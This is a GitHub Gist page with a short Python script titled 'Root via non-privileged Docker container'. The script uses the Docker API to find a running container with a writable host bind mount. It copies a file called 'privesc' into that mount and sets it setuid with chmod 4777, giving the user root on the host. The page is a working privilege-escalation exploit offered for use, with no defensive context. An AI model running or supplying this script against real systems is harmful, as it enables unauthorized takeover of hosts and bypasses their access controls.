-
-
Save christopherwoodall/a12ac6119baf4cc43c058452db242672 to your computer and use it in GitHub Desktop.
Root via non-privileged Docker container
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| import docker | |
| from io import BytesIO | |
| import os | |
| import re | |
| import tarfile | |
| import time | |
| def createfile(path): | |
| def split(bind): | |
| return bind.split(':')[0] | |
| client = docker.from_env() | |
| ro_regex = re.compile('ro') | |
| targets = [(container, bind) for container in client.containers.list() | |
| for bind in container.__dict__['attrs']['HostConfig']['Binds'] | |
| if not ro_regex.findall(bind) and os.path.isdir(split(bind))] | |
| if not targets: | |
| print("[!] No targets for docker abuse found") | |
| return | |
| # Just use first we find | |
| container, bind = targets[0] | |
| host_path, container_path = bind.split(':') | |
| stream = tar_byte_stream(path) | |
| container.put_archive(container_path, stream) | |
| container.exec_run(f'chmod 4777 {container_path}/privesc') | |
| print(f'Success - be root with {host_path}/privesc') | |
| def tar_byte_stream(path): | |
| stream = BytesIO() | |
| tar = tarfile.TarFile(fileobj=stream, mode='w') | |
| with open(path, 'rb') as fp: | |
| data = fp.read() | |
| info = tarfile.TarInfo(name='privesc') | |
| info.size = len(data) | |
| info.mtime = time.time() | |
| tar.addfile(info, BytesIO(data)) | |
| tar.close() | |
| stream.seek(0) | |
| return stream |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment